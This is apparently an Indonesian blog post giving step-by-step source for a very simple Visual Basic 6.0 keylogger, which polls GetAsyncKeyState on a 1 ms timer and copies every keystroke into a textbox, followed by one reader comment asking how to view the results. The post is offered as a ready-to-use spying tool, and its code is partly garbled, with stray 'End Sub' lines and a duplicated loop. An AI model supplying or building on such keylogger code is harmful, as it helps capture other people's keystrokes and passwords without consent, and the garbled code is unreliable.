hahay... maaf gan ni cuma keylogger yang sangat,, amat sederhana....
Anda butuh:
1. Visual Basic 6.0
langsung aja... buka Visual Basic 6.0
Tambahkan :
1. Timer (Interval = 1)
2. Textbox (Text="")
coding di General...
ni codenya...
Private declare function GetAsyncKeyState lib "user32" (ByVal vkey as long) as integer
End Sub
End Sub
Coding di timer1
Dim a As Integer
For a = 1 To 255
if GetAsyncKeyState (a) = -32767 Then
Text1.Text = Text1.Text & Chr (a)
End if
Next a
For a = 1 To 255
if GetAsyncKeyState (a) = -32767 Then
Text1.Text = Text1.Text & Chr (a)
End if
Next a
nah... jadi.......






1 comment:
itu cara melihat hasil nya gmna
Posting Komentar